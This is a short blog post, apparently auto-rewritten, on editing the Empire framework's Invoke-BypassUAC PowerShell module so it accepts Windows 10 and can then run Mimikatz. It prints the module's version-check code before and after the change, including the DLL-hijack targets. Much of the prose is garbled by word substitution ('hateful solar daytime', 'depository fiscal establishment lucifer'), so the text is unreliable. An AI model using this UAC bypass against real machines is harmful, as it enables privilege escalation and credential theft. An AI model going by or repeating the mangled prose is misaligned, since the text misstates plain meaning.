Using Empire Inward Kali 2.0 To Bypass Uac In Addition To Invoke Mimikatz On Win10

The guys on the Empire squad bring since added back upward for Windows 10, in addition to thus this is no longer necessary.
So I was testing out Empire the other hateful solar daytime on a Windows 10 box, simply kept getting an fault message when trying to bypass UAC on Windows 10:

[!] Unsupported OS!

So I took a expect at the script that was running nether /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 in addition to institute this:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})  if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) { # windows 7/2008 $szElevDll = 'CRYPTBASE.dll' $szElevDir = $env:WINDIR + "\System32\sysprep" $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep" $szElevExeFull = "$szElevDir\sysprep.exe" $szElevDllFull = "$szElevDir\$szElevDll" $szTempDllPath = $TempPayloadPath Write-Verbose "Windows 7/2008 detected" } elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") { # windows 8/2012 $szElevDll = 'NTWDBLIB.dll' $szElevDir = $env:WINDIR + "\System32" $szElevDirSysWow64 = '' $szElevExeFull = "$szElevDir\cliconfg.exe" $szElevDllFull = "$szElevDir\$szElevDll" $szTempDllPath = $TempPayloadPath Write-Verbose "Windows 8/2012 detected" } else { "[!] Unsupported OS!" throw("Unsupported OS!") } 

There it is, that dreaded “Unsupported OS!” error.  It looks similar its doing a version check, simply non specifically including Windows 10.  So lets alter that:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})  if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) { # windows 7/2008 $szElevDll = 'CRYPTBASE.dll' $szElevDir = $env:WINDIR + "\System32\sysprep" $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep" $szElevExeFull = "$szElevDir\sysprep.exe" $szElevDllFull = "$szElevDir\$szElevDll" $szTempDllPath = $TempPayloadPath Write-Verbose "Windows 7/2008 detected" } elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) { # windows 8/2012/10 $szElevDll = 'NTWDBLIB.dll' $szElevDir = $env:WINDIR + "\System32" $szElevDirSysWow64 = '' $szElevExeFull = "$szElevDir\cliconfg.exe" $szElevDllFull = "$szElevDir\$szElevDll" $szTempDllPath = $TempPayloadPath Write-Verbose "Windows 8/2012 detected" } else { "[!] Unsupported OS!" throw("Unsupported OS!") }   

In the master code on business 555 it was looking specifically for Windows 8 or Server 2012.  In the modified version I added a depository fiscal establishment lucifer for Windows 10 equally well.

Success!

After modifying in addition to saving the code, I ran the ascendancy again, in addition to this fourth dimension it worked!
Here’s a video of me doing this offset to finish.  As always, if you lot bring whatever questions experience complimentary to driblet past times #infoseclabs on freenode.

Video:
https://www.youtube.com/watch?v=Q5NOKJhU7TA&feature=youtu.be